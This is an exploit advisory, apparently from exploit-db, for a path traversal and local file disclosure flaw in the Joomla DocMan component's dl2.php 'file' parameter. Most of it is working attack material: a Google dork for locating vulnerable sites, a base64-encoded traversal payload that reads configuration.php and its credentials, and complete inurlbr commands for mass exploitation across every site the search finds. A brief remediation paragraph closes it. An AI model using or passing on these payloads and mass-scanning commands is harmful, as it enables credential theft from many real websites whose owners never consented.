Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)

Exploring component of Joomla cms

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: [email protected]
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
https://www.exploit-db.com/exploits/37620/

There is a get parameter untreated in the application "file=" which enables download files from the server.

Google Dork:
inurl:"/components/com_docman/dl2.php"

POC:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=base64([LDF])

Internment such an application must use the native function of php base64_decode to access your files.

string base64_decode ( string $data [, bool $strict = false ] );
more http://php.net/manual/en/function.base64-decode.php

The application uses crypt 64 then we should do the same to get the server files.

injection string:
../../../../../../../target/www/configuration.php <= Not Ready

encoded string:
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !

Example
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'inurl:"/components/com_docman/dl2.php"'

SET OUTPUT FILE:
 -s dl2.txt 

SET EXPLOIT GET
To encode our injection string we use a ineterna function of inurlbr script.
 base64 Encrypt values in base64.
     Example: base64({value})
     Usage:    base64(102030)
     Usage:
      --exploit-get 'user?id=base64(102030)'
  URL with inject get:
  http://www.target.us/user?id=MTAyMDMw
Use:
--exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'

OR USE SITE ENCODER: https://www.base64encode.org/
Use:
--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='

SET FILTER 
Filter results in unique domains.
--unique

SET VALIDATION
Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:    --ifcode 200

COMPLETE COMMAND:
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'  --unique --ifcode 200

OR

php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='  --unique --ifcode 200


Remediation:
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
https://www.owasp.org/index.php/Full_Path_Disclosure